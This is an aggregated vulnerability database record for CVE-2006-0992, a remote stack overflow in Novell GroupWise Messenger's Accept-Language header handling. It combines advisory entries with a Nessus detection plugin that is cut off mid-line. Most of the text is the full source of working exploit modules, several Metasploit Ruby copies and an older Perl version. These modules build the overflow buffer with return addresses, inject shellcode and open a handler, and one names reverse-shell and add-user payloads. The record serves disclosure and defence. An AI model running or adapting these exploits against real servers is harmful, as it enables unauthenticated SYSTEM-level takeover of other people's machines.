ID OSVDB:24617 Type osvdb Reporter CIRT(advisory@cirt.dk) Modified 2006-04-13T05:17:35
Description
Vulnerability Description
A remote overflow exists in Novell GroupWise Messenger. The Novell Messaging Agent service fails to check length during the parsing of long parameters within the Accept-Language header resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution in the context of SYSTEM or superuser.
Solution Description
Upgrade to GroupWise Messenger version 2.0 Public Beta 2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Short Description
A remote overflow exists in Novell GroupWise Messenger. The Novell Messaging Agent service fails to check length during the parsing of long parameters within the Accept-Language header resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution in the context of SYSTEM or superuser.
References:
Vendor Specific Solution URL: http://support.novell.com/cgi-bin/search/searchtid.cgi?10100861.htm
Security Tracker: 1015911
Secunia Advisory ID:19663
Other Advisory URL: http://cirt.dk/advisories/cirt-42-advisory.txt
Other Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-008.html
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0264.html
Mail List Post: http://archives.neohapsis.com/archives/dailydave/2006-q2/0051.html
Keyword: ZDI-06-008
Keyword: TID10100861
Keyword: port 8300/tcp
Generic Informational URL: http://metasploit.blogspot.com/2006/04/exploit-development-groupwise_14.html
Generic Exploit URL: http://www.milw0rm.com/exploits/1679
FrSIRT Advisory: ADV-2006-1355
CVE-2006-0992
Bugtraq ID: 17503
{"type": "osvdb", "published": "2006-04-13T05:17:35", "href": "https://vulners.com/osvdb/OSVDB:24617", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "viewCount": 3, "edition": 1, "reporter": "CIRT(advisory@cirt.dk)", "title": "Novell GroupWise Messenging Agent Accept-Language Header Remote Overflow", "affectedSoftware": [{"operator": "eq", "version": "2.0", "name": "GroupWise Messenger"}], "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2017-04-28T13:20:21", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-0992"]}, {"type": "saint", "idList": ["SAINT:0663FDAD22F89FCA93BDCCEBE253E55E", "SAINT:5920E43A5AB321EAC31BCFEE29441DD5", "SAINT:138705C17FEBFEA9DB12840AACEEFE5A"]}, {"type": "exploitdb", "idList": ["EDB-ID:1679", "EDB-ID:16757"]}, {"type": "canvas", "idList": ["GROUPWISE_MESSENGER"]}, {"type": "nessus", "idList": ["NMMA_OVERFLOW.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/NOVELL_MESSENGER_ACCEPTLANG"]}, {"type": "zdi", "idList": ["ZDI-06-008"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83166"]}], "modified": "2017-04-28T13:20:21", "rev": 2}, "vulnersScore": 7.8}, "references": [], "id": "OSVDB:24617", "lastseen": "2017-04-28T13:20:21", "cvelist": ["CVE-2006-0992"], "modified": "2006-04-13T05:17:35", "description": "## Vulnerability Description\nA remote overflow exists in Novell GroupWise Messenger. The Novell Messaging Agent service fails to check length during the parsing of long parameters within the Accept-Language header resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution in the context of SYSTEM or superuser.\n## Solution Description\nUpgrade to GroupWise Messenger version 2.0 Public Beta 2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in Novell GroupWise Messenger. The Novell Messaging Agent service fails to check length during the parsing of long parameters within the Accept-Language header resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution in the context of SYSTEM or superuser.\n## References:\nVendor Specific Solution URL: http://support.novell.com/cgi-bin/search/searchtid.cgi?10100861.htm\nSecurity Tracker: 1015911\n[Secunia Advisory ID:19663](https://secuniaresearch.flexerasoftware.com/advisories/19663/)\nOther Advisory URL: http://cirt.dk/advisories/cirt-42-advisory.txt\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-008.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0264.html\nMail List Post: http://archives.neohapsis.com/archives/dailydave/2006-q2/0051.html\nKeyword: ZDI-06-008\nKeyword: TID10100861\nKeyword: port 8300/tcp\nGeneric Informational URL: http://metasploit.blogspot.com/2006/04/exploit-development-groupwise_14.html\nGeneric Exploit URL: http://www.milw0rm.com/exploits/1679\nFrSIRT Advisory: ADV-2006-1355\n[CVE-2006-0992](https://vulners.com/cve/CVE-2006-0992)\nBugtraq ID: 17503\n"}
{"cve": [{"lastseen": "2020-10-03T11:48:13", "description": "Stack-based buffer overflow in Novell GroupWise Messenger before 2.0 Public Beta 2 allows remote attackers to execute arbitrary code via a long Accept-Language value without a comma or semicolon. NOTE: due to a typo, the original ZDI advisory accidentally referenced CVE-2006-0092. This is the correct identifier.\nUpgrade to GroupWise Messenger, 2.0 Public Beta 2 to fix this issue.", "edition": 3, "cvss3": {}, "published": "2006-04-14T10:02:00", "title": "CVE-2006-0992", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0992"], "modified": "2018-10-18T16:30:00", "cpe": ["cpe:/a:novell:groupwise_messenger:2.0"], "id": "CVE-2006-0992", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0992", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:novell:groupwise_messenger:2.0:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:59", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0992"], "description": "Added: 04/20/2006 \nCVE: [CVE-2006-0992](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0992>) \nBID: [17503](<http://www.securityfocus.com/bid/17503>) \nOSVDB: [24617](<http://www.osvdb.org/24617>) \n\n\n### Background\n\n[Novell GroupWise](<http://www.novell.com/products/groupwise/>) includes the Messaging Agent which offers an HTTP service on port 8300/TCP. \n\n### Problem\n\nA buffer overflow in the Messaging Agent allows remote attackers to execute commands by sending a long, specially crafted `**Accept-Language**` header in an HTTP request. \n\n### Resolution\n\nApply the fix referenced in [Novell Technical Information Document 10100861](<http://support.novell.com/cgi-bin/search/searchtid.cgi?10100861.htm>). \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0264.html> \n\n\n### Limitations\n\nExploit works on Novell GroupWise Messenger Server 2.0. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2006-04-20T00:00:00", "published": "2006-04-20T00:00:00", "id": "SAINT:138705C17FEBFEA9DB12840AACEEFE5A", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/groupwise_messenger_accept_language", "type": "saint", "title": "Novell GroupWise Messenger Accept-Language buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0992"], "description": "Added: 04/20/2006 \nCVE: [CVE-2006-0992](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0992>) \nBID: [17503](<http://www.securityfocus.com/bid/17503>) \nOSVDB: [24617](<http://www.osvdb.org/24617>) \n\n\n### Background\n\n[Novell GroupWise](<http://www.novell.com/products/groupwise/>) includes the Messaging Agent which offers an HTTP service on port 8300/TCP. \n\n### Problem\n\nA buffer overflow in the Messaging Agent allows remote attackers to execute commands by sending a long, specially crafted `**Accept-Language**` header in an HTTP request. \n\n### Resolution\n\nApply the fix referenced in [Novell Technical Information Document 10100861](<http://support.novell.com/cgi-bin/search/searchtid.cgi?10100861.htm>). \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0264.html> \n\n\n### Limitations\n\nExploit works on Novell GroupWise Messenger Server 2.0. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2006-04-20T00:00:00", "published": "2006-04-20T00:00:00", "id": "SAINT:0663FDAD22F89FCA93BDCCEBE253E55E", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/groupwise_messenger_accept_language", "title": "Novell GroupWise Messenger Accept-Language buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0992"], "edition": 2, "description": "Added: 04/20/2006 \nCVE: [CVE-2006-0992](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0992>) \nBID: [17503](<http://www.securityfocus.com/bid/17503>) \nOSVDB: [24617](<http://www.osvdb.org/24617>) \n\n\n### Background\n\n[Novell GroupWise](<http://www.novell.com/products/groupwise/>) includes the Messaging Agent which offers an HTTP service on port 8300/TCP. \n\n### Problem\n\nA buffer overflow in the Messaging Agent allows remote attackers to execute commands by sending a long, specially crafted `**Accept-Language**` header in an HTTP request. \n\n### Resolution\n\nApply the fix referenced in [Novell Technical Information Document 10100861](<http://support.novell.com/cgi-bin/search/searchtid.cgi?10100861.htm>). \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0264.html> \n\n\n### Limitations\n\nExploit works on Novell GroupWise Messenger Server 2.0. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2006-04-20T00:00:00", "published": "2006-04-20T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/groupwise_messenger_accept_language", "id": "SAINT:5920E43A5AB321EAC31BCFEE29441DD5", "title": "Novell GroupWise Messenger Accept-Language buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T17:19:23", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0992"], "description": "**Name**| groupwise_messenger \n---|--- \n**CVE**| CVE-2006-0992 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Groupwise Messenger 2 Buffer Overflow \n**Notes**| CVE Name: CVE-2006-0992 \nVENDOR: Novell \nRepeatability: You get one shot \nDate public: 2006-04-13 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0992 \nCVSS: 10.0 \n\n", "edition": 2, "modified": "2006-04-14T10:02:00", "published": "2006-04-14T10:02:00", "id": "GROUPWISE_MESSENGER", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/groupwise_messenger", "type": "canvas", "title": "Immunity Canvas: GROUPWISE_MESSENGER", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:42:09", "bulletinFamily": "info", "cvelist": ["CVE-2006-0992"], "edition": 3, "description": "This vulnerability allows attackers to execute arbitrary code on vulnerable installations of the Novell GroupWise Messenger. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Novell Messaging Agent, a web server that listens by default on TCP port 8300. Insufficient length checks during the parsing of long parameters within the Accept-Language header results in an exploitable stack overflow under the context of the SYSTEM user.", "modified": "2006-06-22T00:00:00", "published": "2006-04-13T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-06-008/", "id": "ZDI-06-008", "title": "Novell GroupWise Messenger Accept-Language Buffer Overflow Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T06:26:49", "description": "Novell Messenger Server 2.0 Accept-Language Overflow. CVE-2006-0992. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "type": "exploitdb", "title": "Novell Messenger Server 2.0 Accept-Language Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0992"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16757", "href": "https://www.exploit-db.com/exploits/16757/", "sourceData": "##\r\n# $Id: novell_messenger_acceptlang.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Novell Messenger Server 2.0 Accept-Language Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Novell GroupWise\r\n\t\t\t\tMessenger Server v2.0. This flaw is triggered by any HTTP\r\n\t\t\t\trequest with an Accept-Language header greater than 16 bytes.\r\n\t\t\t\tTo overwrite the return address on the stack, we must first\r\n\t\t\t\tpass a memcpy() operation that uses pointers we supply. Due to the\r\n\t\t\t\tlarge list of restricted characters and the limitations of the current\r\n\t\t\t\tencoder modules, very few payloads are usable.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-0992'],\r\n\t\t\t\t\t['OSVDB', '24617'],\r\n\t\t\t\t\t['BID', '17503'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 500,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x2c\\x3b\"+ [*(\"A\"..\"Z\")].join,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Groupwise Messenger DClient.dll v10510.37', { 'Rets' => [0x6103c3d3, 0x61041010] }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Apr 13 2006'))\r\n\r\n\t\tregister_options( [ Opt::RPORT(8300) ], self.class )\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tlang = rand_text_alphanumeric(1900)\r\n\t\tlang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC\r\n\t\tlang[272, 4] = [target['Rets'][1]].pack('V') # DST\r\n\t\tlang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP\r\n\t\tlang[268, 2] = \"\\xeb\\x06\"\r\n\t\tlang[276, payload.encoded.length] = payload.encoded\r\n\r\n\t\tres = \"GET / HTTP/1.1\\r\\nAccept-Language: #{lang}\\r\\n\\r\\n\"\r\n\r\n\t\tprint_status(\"Trying target address 0x%.8x...\" % target['Rets'][0])\r\n\t\tsock.put(res)\r\n\t\tsock.close\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16757/"}, {"lastseen": "2016-01-31T14:40:29", "description": "Novell Messenger Server 2.0 (Accept-Language) Remote Overflow Exploit. CVE-2006-0992. Remote exploit for novell platform", "published": "2006-04-15T00:00:00", "type": "exploitdb", "title": "Novell Messenger Server 2.0 Accept-Language Remote Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0992"], "modified": "2006-04-15T00:00:00", "id": "EDB-ID:1679", "href": "https://www.exploit-db.com/exploits/1679/", "sourceData": "\n##\n# This file is part of the Metasploit Framework and may be redistributed\n# according to the licenses defined in the Authors field below. In the\n# case of an unknown or missing license, this file defaults to the same\n# license as the core Framework (dual GPLv2 and Artistic). The latest\n# version of the Framework can always be obtained from metasploit.com.\n##\n\npackage Msf::Exploit::novell_messenger_acceptlang;\nuse strict;\nuse base \"Msf::Exploit\";\nuse Pex::Text;\n\nmy $advanced = { };\n\nmy $info =\n {\n\t'Name' => 'Novell Messenger Server 2.0 Accept-Language Overflow',\n\t'Version' => '$Revision: 1.5 $',\n\t'Authors' => [ 'H D Moore <hdm[at]metasploit.com>' ],\n\n\t'Arch' => [ 'x86' ],\n\t'OS' => [ 'win32', 'winnt', 'winxp', 'win2k', 'win2003' ],\n\t'Priv' => 1,\n\n\t'AutoOpts' => { 'EXITFUNC' => 'process' },\n\n\t'UserOpts' =>\n\t {\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\n\t\t'RPORT' => [1, 'PORT', 'The target port', 8300 ],\n\t\t'VHOST' => [0, 'DATA', 'The virtual host name of the server'],\n\t\t'SSL' => [0, 'BOOL', 'Use SSL'],\n\t },\n\n\t'Payload' =>\n\t {\n\t\t'Space' => 500, \n\t\t'BadChars' => \"\\x00\\x0a\\x2c\\x3b\".join(\"\", (\"A\"..\"Z\")), # data is downcased\n\t\t'Keys' \t => ['+ws2ord'],\n\t\t'Prepend' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # add esp, -3500\n\t },\n\n\t'Description' => Pex::Text::Freeform(qq{\n\t\tThis module exploits a stack overflow in Novell GroupWise\n\tMessenger Server v2.0. This flaw is triggered by any HTTP\n\trequest with an Accept-Language header greater than 16 bytes.\n\tTo overwrite the return address on the stack, we must first\n\tpass a memcpy() operation that uses pointers we supply. Due to the\n\tlarge list of restricted characters and the limitations of the current\n\tencoder modules, very few payloads are usable. The 'known good' set\n\tincludes win32_adduser, win32_exec, and win32_reverse_ord;\n\n}),\n\n\t'Refs' =>\n\t [\n\t \t['OSVDB', '24617'],\n\t \t['BID', '17503'],\n\t\t['CVE', '2006-0992'],\n\t ],\n\n\t'Targets' =>\n\t [\n\t\t[ 'Groupwise Messenger DClient.dll v10510.37', 0x6103c3d3, 0x61041001 ] # .data | jmp esp\n\t ],\n\n\t'Keys' => ['groupwise'],\n\n\t'DisclosureDate' => 'Apr 13 2005',\n };\n\nsub new {\n\tmy $class = shift;\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\treturn($self);\n}\n\nsub Exploit {\n\tmy $self = shift;\n\tmy $target_host = $self->GetVar('RHOST');\n\tmy $target_port = $self->GetVar('RPORT');\n\tmy $target_idx = $self->GetVar('TARGET');\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\n\tmy $target = $self->Targets->[$target_idx];\n\n\t$self->PrintLine( \"[*] Attempting to exploit \" . $target->[0] );\n\n\tmy $s = Msf::Socket::Tcp->new(\n\t\t'PeerAddr' => $target_host,\n\t\t'PeerPort' => $target_port,\n\t\t'SSL' => $self->GetVar('SSL'),\n\t );\n\n\tif ( $s->IsError ) {\n\t\t$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );\n\t\treturn;\n\t}\n\n\tmy $pattern = Pex::Text::AlphaNumText(1900);\n\tsubstr($pattern, 16, 4, pack('V', $target->[2])); # SRC\n\tsubstr($pattern, 272, 4, pack('V', $target->[2])); # DST\n\tsubstr($pattern, 264, 4, pack('V', $target->[1])); # JMP ESP\n\tsubstr($pattern, 268, 2, \"\\xeb\\x06\"); # JMP +6\t\n\tsubstr($pattern, 276, length($shellcode), $shellcode);\n\n\tmy $request =\n\t \"GET / HTTP/1.1\\r\\n\".\n\t \"Accept-Language: $pattern\\r\\n\".\n\t \"\\r\\n\";\n\t\n\t$s->Send($request);\n\n\t$self->PrintLine(\"[*] Overflow request sent...\");\n\n\t$self->Handler($s);\n\treturn;\n}\n\n1; \n\n# milw0rm.com [2006-04-15]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1679/"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:59", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Novell Messenger Server 2.0 Accept-Language Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0992"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83166", "href": "https://packetstormsecurity.com/files/83166/Novell-Messenger-Server-2.0-Accept-Language-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Novell Messenger Server 2.0 Accept-Language Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Novell GroupWise \nMessenger Server v2.0. This flaw is triggered by any HTTP \nrequest with an Accept-Language header greater than 16 bytes. \nTo overwrite the return address on the stack, we must first \npass a memcpy() operation that uses pointers we supply. Due to the \nlarge list of restricted characters and the limitations of the current \nencoder modules, very few payloads are usable. \n}, \n'Author' => [ 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2006-0992'], \n['OSVDB', '24617'], \n['BID', '17503'], \n], \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 500, \n'BadChars' => \"\\x00\\x0a\\x2c\\x3b\"+ [*(\"A\"..\"Z\")].join, \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['Groupwise Messenger DClient.dll v10510.37', { 'Rets' => [0x6103c3d3, 0x61041010] }], \n], \n'DisclosureDate' => 'Apr 13 2006')) \n \nregister_options( [ Opt::RPORT(8300) ], self.class ) \nend \n \ndef exploit \nconnect \n \nlang = rand_text_alphanumeric(1900) \nlang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC \nlang[272, 4] = [target['Rets'][1]].pack('V') # DST \nlang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP \nlang[268, 2] = \"\\xeb\\x06\" \nlang[276, payload.encoded.length] = payload.encoded \n \nres = \"GET / HTTP/1.1\\r\\nAccept-Language: #{lang}\\r\\n\\r\\n\" \n \nprint_status(\"Trying target address 0x%.8x...\" % target['Rets'][0]) \nsock.put(res) \nsock.close \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83166/novell_messenger_acceptlang.rb.txt"}], "metasploit": [{"lastseen": "2020-06-30T04:46:27", "description": "This module exploits a stack buffer overflow in Novell GroupWise Messenger Server v2.0. This flaw is triggered by any HTTP request with an Accept-Language header greater than 16 bytes. To overwrite the return address on the stack, we must first pass a memcpy() operation that uses pointers we supply. Due to the large list of restricted characters and the limitations of the current encoder modules, very few payloads are usable.\n", "published": "2006-04-14T20:22:15", "type": "metasploit", "title": "Novell Messenger Server 2.0 Accept-Language Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0992"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/HTTP/NOVELL_MESSENGER_ACCEPTLANG", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Novell Messenger Server 2.0 Accept-Language Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Novell GroupWise\n Messenger Server v2.0. This flaw is triggered by any HTTP\n request with an Accept-Language header greater than 16 bytes.\n To overwrite the return address on the stack, we must first\n pass a memcpy() operation that uses pointers we supply. Due to the\n large list of restricted characters and the limitations of the current\n encoder modules, very few payloads are usable.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-0992'],\n ['OSVDB', '24617'],\n ['BID', '17503'],\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 500,\n 'BadChars' => \"\\x00\\x0a\\x2c\\x3b\"+ [*(\"A\"..\"Z\")].join,\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Groupwise Messenger DClient.dll v10510.37', { 'Rets' => [0x6103c3d3, 0x61041010] }],\n ],\n 'DisclosureDate' => 'Apr 13 2006'))\n\n register_options( [ Opt::RPORT(8300) ])\n end\n\n def exploit\n connect\n\n lang = rand_text_alphanumeric(1900)\n lang[ 16, 4] = [target['Rets'][1]].pack('V') # SRC\n lang[272, 4] = [target['Rets'][1]].pack('V') # DST\n lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP\n lang[268, 2] = \"\\xeb\\x06\"\n lang[276, payload.encoded.length] = payload.encoded\n\n res = \"GET / HTTP/1.1\\r\\nAccept-Language: #{lang}\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target['Rets'][0])\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/novell_messenger_acceptlang.rb"}], "nessus": [{"lastseen": "2021-01-01T04:00:30", "description": "The remote host is running Novell Messenger Messaging Agent, an\nenterprise instant messaging server for Windows, Linux, and Netware. \n\nThis version of this service is running an HTTP server which is\nvulnerable to a stack overflow. \n\nAn attacker can exploit this vulnerability to execute code on the\nremote host.", "edition": 23, "published": "2006-04-19T00:00:00", "title": "Novell GroupWise Messenger Accept Language Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0992"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "NMMA_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/21243", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21243);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2006-0992\");\n script_bugtraq_id (17503);\n\n script_name(english:\"Novell GroupWise Messenger Accept Language Remote Overflow\");\n script_summary(english:\"Checks for Novell Messenger Messaging Agent Buffer overflow\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"It is possible to execute code on the remote web server.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Novell Messenger Messaging Agent, an\nenterprise instant messaging server for Windows, Linux, and Netware. \n\nThis version of this service is running an HTTP server which is\nvulnerable to a stack overflow. \n\nAn attacker can exploit this vulnerability to execute code on the\nremote host.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-06-008/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Groupwise Messenger 2.0.1 beta3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell Messenger Server 2.0 Accept-Language Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/04/19\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencie(\"nmma_detection.nasl\");\n script_exclude_keys('Settings/disable_cgi_scanning');\n script_require_ports(\"Services/www\", 8300);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:8300); \nif (!get_kb_item(\"Novell/NMMA/\" + port)) exit(0, \"Novell NMMA was not detected on port \"+port+\".\");\n\n# getlocation command was not in 2.0.0\ndata = string (\"GET /getlocation HTTP/1.0\\r\\n\\r\\n\");\nw = http_send_recv_buf(port: port, data: data, exit_on_fail:TRUE);\nbuf = strcat(w[0], w[1], '\\r\\n', w[2]);\n\n# patched version replies with the download page\n\nif (egrep (pattern:\"^HTTP/1.0 